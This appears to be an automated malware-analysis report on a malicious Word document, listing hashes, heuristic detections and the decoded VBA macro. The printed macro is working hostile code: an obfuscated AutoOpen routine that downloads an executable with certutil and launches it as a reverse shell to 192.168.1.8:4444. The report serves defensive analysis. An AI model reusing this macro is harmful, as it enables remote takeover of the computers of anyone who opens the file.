Office (OOXML) malware analysis — malicious · 4e0b29c4bbab9f67

MALICIOUS

Office (OOXML)

21.1 KB Created: 2021-06-23 06:31:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-30

MD5: 15f63bb7ac1c7e0dfcf2829f0759d3fa SHA-1: cec25ceffd3b2e13fbed6a35be5b9371fa97a5c4 SHA-256: 4e0b29c4bbab9f67f487eb238e8a95b33d28e2fe6ed1ea4c2335e41360ca2278

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains an obfuscated VBA macro with an AutoOpen subroutine that utilizes the Shell() function. This macro attempts to download a second-stage executable named 'nc54.exe' from 'http://localhost:222/nc54.exe' using certutil and then execute it. The use of obfuscated VBA and the execution of a downloaded payload are indicative of a downloader malware.

Heuristics 6

VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell (last)
```
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
Matched line in script
```
Shell (last)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	7029 bytes
SHA-256: `d6355edf110ba070b7208c22e62666612143c0d28ddd743c6b0184a4f417ef31`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "NewMacros" Sub AutoOpen() Dim AQOIfbcJ As String Dim KWBc999 As String Dim iOKfOMTBTN As String Dim l5BOsFL6hO As String Dim FpypyXeL3 As String Dim x9VoDmfopr As String Dim x4MAL8gxRUz As String Dim mL5SIH As String Dim FfQo As String Dim uBsHlBUA As String Dim TI9Lt As String Dim KOgYPI33EAHI As String Dim last As String AQOIfbcJ = ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108) KWBc999 = ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(45) & ChrW(67) & ChrW(111) & ChrW(109) & ChrW(109) iOKfOMTBTN = ChrW(97) & ChrW(110) & ChrW(100) & ChrW(32) & ChrW(34) & ChrW(34) & ChrW(99) & ChrW(101) & ChrW(114) & ChrW(116) l5BOsFL6hO = ChrW(117) & ChrW(116) & ChrW(105) & ChrW(108) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(45) FpypyXeL3 = ChrW(117) & ChrW(114) & ChrW(108) & ChrW(99) & ChrW(97) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(32) & ChrW(45) x9VoDmfopr = ChrW(102) & ChrW(32) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) x4MAL8gxRUz = ChrW(111) & ChrW(99) & ChrW(97) & ChrW(108) & ChrW(104) & ChrW(111) & ChrW(115) & ChrW(116) & ChrW(58) & ChrW(50) mL5SIH = ChrW(50) & ChrW(50) & ChrW(50) & ChrW(47) & ChrW(110) & ChrW(99) & ChrW(54) & ChrW(52) & ChrW(46) & ChrW(101) FfQo = ChrW(120) & ChrW(101) & ChrW(32) & ChrW(99) & ChrW(58) & ChrW(92) & ChrW(112) & ChrW(114) & ChrW(111) & ChrW(103) uBsHlBUA = ChrW(114) & ChrW(97) & ChrW(109) & ChrW(100) & ChrW(97) & ChrW(116) & ChrW(97) & ChrW(92) & ChrW(98) & ChrW(97) TI9Lt = ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(59) & ChrW(83) & ChrW(116) & ChrW(97) & ChrW(114) KOgYPI33EAHI = ChrW(116) & ChrW(45) & ChrW(80) & ChrW(114) & ChrW(111) & ChrW(99) & ChrW(101) & ChrW(115) & ChrW(115) & ChrW(32) & ChrW(40) & ChrW(99) & ChrW(58) & ChrW(92) & ChrW(112) & ChrW(114) & ChrW(111) & ChrW(103) & ChrW(114) & ChrW(97) & ChrW(109) & ChrW(100) & ChrW(97) & ChrW(116) & ChrW(97) & ChrW(92) & ChrW(98) & ChrW(97) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(49) & ChrW(57) & ChrW(50) & ChrW(46) & ChrW(49) & ChrW(54) & ChrW(56) & ChrW(46) & ChrW(49) & ChrW(46) & ChrW(56) & ChrW(32) & ChrW(52) & ChrW(52) & ChrW(52) & ChrW(52) & ChrW(32) & ChrW(45) & ChrW(101) & ChrW(32) & ChrW(99) & ChrW(109) & ChrW(100) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(41) & ChrW(34) & ChrW(34) last = AQOIfbcJ + KWBc999 + iOKfOMTBTN + l5BOsFL6hO + FpypyXeL3 + x9VoDmfopr + x4MAL8gxRUz + mL5SIH + FfQo + uBsHlBUA + TI9Lt + KOgYPI33EAHI Shell (last) End Sub Public Function rwJW8Eo(ByVal y6wJeE As Long, ByVal j2NIfIfOyd As Byte) As Long rwJW8Eo = y6wJeE If j2NIfIfOyd > 0 Then If y6wJeE > 0 Then rwJW8Eo=Int(rwJW8Eo/(2^j2NIfIfOyd)) Else If j2NIfIfOyd > 31 Then rwJW8Eo = 0 Else rwJW8Eo = rwJW8Eo And &H7FFFFFFF rwJW8Eo=Int(rwJW8Eo/(2^j2NIfIfOyd)) rwJW8Eo=rwJW8Eo Or 2^(31-j2NIfIfOyd) End If End If End If End Function Public Function QwnSDadaUfZi(ByVal y6wJeE As Long, ByVal j2NIfIfOyd As Byte) As Long QwnSDadaUfZi = y6wJeE If j2NIfIfOyd > 0 Then Dim i As Byte Dim m As Long For i = 1 To j2NIfIfOyd m = QwnSDadaUfZi And &H40000000 QwnSDadaUfZi = (QwnSDadaUfZi And &H3FFFFFFF) * 2 If m <> 0 Then QwnSDadaUfZi = QwnSDadaUfZi Or &H80000000 End If Next i End If End Function Public Function paYvJ9(ByVal v5b1as As Long) As Long Const tnAEU4 As Long = 5570645 Const IwVw8J As Long = 52428 Const d1 = 7 Const d2 = 14 Dim t As Long, u, out As Long t = (v5b1as Xor rwJW8Eo(v5b1as, d2)) And IwVw8J u = v5b1as Xor t Xor QwnSDadaUfZi(t, d2) t = (u Xor rwJW8Eo(u, d1)) And tnAEU4 out = (u Xor t Xor QwnSDadaUfZi(t, d1)) paYvJ9 = out End Function Public Function q6cCASmDb(ByRef k1Ld0UD() As Byte) As String Dim i, fr, QaopC8g20Cb, raw As Long Dim a As String, b As String, c As String, d As String Dim l5t0W As String Dim mSseRxP7C() As String Dim a2, b2 As String l5t0W = "" For i = 0 To (UBound(k1Ld0UD) / 4 + 1) fr = i * 4 If fr > UBound(k1Ld0UD) Then Exit For End If QaopC8g20Cb = 0 QaopC8g20Cb = QaopC8g20Cb Or QwnSDadaUfZi(k1Ld0UD(fr + 3), 24) QaopC8g20Cb = QaopC8g20Cb Or QwnSDadaUfZi(k1Ld0UD(fr + 2), 16) QaopC8g20Cb = QaopC8g20Cb Or QwnSDadaUfZi(k1Ld0UD(fr + 1), 8) QaopC8g20Cb = QaopC8g20Cb Or k1Ld0UD(fr + 0) raw = paYvJ9(QaopC8g20Cb) a = Chr(rwJW8Eo((raw And &HFF000000), 24)) b = Chr(rwJW8Eo((raw And 16711680), 16)) c = Chr(rwJW8Eo((raw And 65280), 8)) d = Chr(rwJW8Eo((raw And 255), 0)) l5t0W = l5t0W + d + c + b + a Next i q6cCASmDb = l5t0W End Function Public Function z5jicJcU(k1Ld0UD As String) As String Dim eOQtn() As Byte, uGyxgSfgE() As Byte, arrayByte3(255) As Byte Dim WSY9sJbOEa0(63) As Long, arrayLong5(63) As Long Dim nbkbzqzfm(63) As Long, jOvnNI As Long Dim vdsMcbp As Integer, iter As Long, nrM7vAzCO0IO As Long, d6C84mM As Long Dim l5t0W As String k1Ld0UD = Replace(k1Ld0UD, vbCr, vbNullString) k1Ld0UD = Replace(k1Ld0UD, vbLf, vbNullString) d6C84mM = Len(k1Ld0UD) Mod 4 If InStrRev(k1Ld0UD, "==") Then vdsMcbp = 2 ElseIf InStrRev(k1Ld0UD, "" + "=") Then vdsMcbp = 1 End If For d6C84mM = 0 To 255 Select Case d6C84mM Case 65 To 90 arrayByte3(d6C84mM) = d6C84mM - 65 Case 97 To 122 arrayByte3(d6C84mM) = d6C84mM - 71 Case 48 To 57 arrayByte3(d6C84mM) = d6C84mM + 4 Case 43 arrayByte3(d6C84mM) = 62 Case 47 arrayByte3(d6C84mM) = 63 End Select Next d6C84mM For d6C84mM = 0 To 63 WSY9sJbOEa0(d6C84mM) = d6C84mM * 64 arrayLong5(d6C84mM) = d6C84mM * 4096 nbkbzqzfm(d6C84mM) = d6C84mM * 262144 Next d6C84mM uGyxgSfgE = StrConv(k1Ld0UD, vbFromUnicode) ReDim eOQtn((((UBound(uGyxgSfgE) + 1) \ 4) * 3) - 1) For iter = 0 To UBound(uGyxgSfgE) Step 4 jOvnNI = nbkbzqzfm(arrayByte3(uGyxgSfgE(iter))) + arrayLong5(arrayByte3(uGyxgSfgE(iter + 1))) + WSY9sJbOEa0(arrayByte3(uGyxgSfgE(iter + 2))) + arrayByte3(uGyxgSfgE(iter + 3)) d6C84mM = jOvnNI And 16711680 eOQtn(nrM7vAzCO0IO) = d6C84mM \ 65536 d6C84mM = jOvnNI And 65280 eOQtn(nrM7vAzCO0IO + 1) = d6C84mM \ 256 eOQtn(nrM7vAzCO0IO + 2) = jOvnNI And 255 nrM7vAzCO0IO = nrM7vAzCO0IO + 3 Next iter l5t0W = StrConv(eOQtn, vbUnicode) If vdsMcbp Then l5t0W = Left$(l5t0W, Len(l5t0W) - vdsMcbp) z5jicJcU = q6cCASmDb(StrConv(l5t0W, vbFromUnicode)) z5jicJcU = IPuuuUvvI35(z5jicJcU, "~") End Function Function IPuuuUvvI35(rA0Iv3LXujX As String, E9UVc As String) As String Dim BjBQ8 As Long Dim rH0IXqWbjjTW() As String rH0IXqWbjjTW = Split(rA0Iv3LXujX, E9UVc) BjBQ8 = UBound(rH0IXqWbjjTW, 1) If BjBQ8 <> 0 Then rA0Iv3LXujX = Left$(rA0Iv3LXujX, Len(rA0Iv3LXujX) - BjBQ8) End If IPuuuUvvI35 = rA0Iv3LXujX End Function
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	22016 bytes
SHA-256: `490c602f3dc28fa1ecbdee582d66e11b52e9997d0c1f4c87543b81cb4e8df852`

Open this report in the interactive analyzer, or submit your own file for analysis.